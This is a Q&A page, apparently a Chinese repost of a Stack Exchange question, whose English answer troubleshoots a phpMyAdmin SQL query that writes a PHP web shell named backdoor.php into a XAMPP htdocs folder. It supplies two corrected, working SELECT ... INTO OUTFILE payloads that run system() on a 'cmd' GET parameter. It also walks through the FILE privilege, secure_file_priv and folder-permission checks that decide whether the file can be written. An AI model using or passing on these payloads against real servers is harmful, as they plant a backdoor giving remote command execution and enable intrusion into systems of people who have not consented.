在phpMyAdmin中执行SQL写入WebShell时出现错误求助
Troubleshooting Your phpMyAdmin WebShell Upload SQL Query
Let's break down the issues with your SQL statement and fix them step by step:
1. Syntax Issues in Your Original Query
Your original query has two key syntax problems that are likely causing the error:
- Quote inconsistency: You used double quotes (
") to wrap the PHP payload, but inside that payload you have single quotes (') for$_GET['cmd']. While some SQL modes might tolerate this, it’s inconsistent and can confuse MySQL’s parser. MySQL standard uses single quotes for string literals, so we’ll align that. - Unescaped Windows path: Backslashes (
\) in your Windows path (C:\xampp\htdocs\backdoor.php) are treated as escape characters in SQL. This means MySQL will interpret\xas an escape sequence instead of part of the path.
2. Corrected SQL Query
Replace your query with one of these properly formatted versions:
Option 1: Escaped backslashes for Windows path
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:\\xampp\\htdocs\\backdoor.php';
Option 2: Forward slashes (MySQL accepts these on Windows too)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/xampp/htdocs/backdoor.php';
3. Additional Checks If Errors Persist
If you still run into issues after fixing the syntax, verify these common blockers:
- FILE Privilege: Ensure the MySQL user you’re using has the
FILEprivilege. Run this query to check:SHOW GRANTS FOR CURRENT_USER; - secure_file_priv Restriction: MySQL’s
secure_file_privvariable might limit where files can be written. Check its value with:
If it’s set to a specific directory, you’ll need to save your backdoor there instead ofSHOW VARIABLES LIKE 'secure_file_priv';htdocs. - Directory Permissions: Confirm the
C:\xampp\htdocsfolder has write permissions for the user running the MySQL service.
内容的提问来源于stack exchange,提问作者Bartosz Cieszewski
相关产品推荐
相关产品推荐

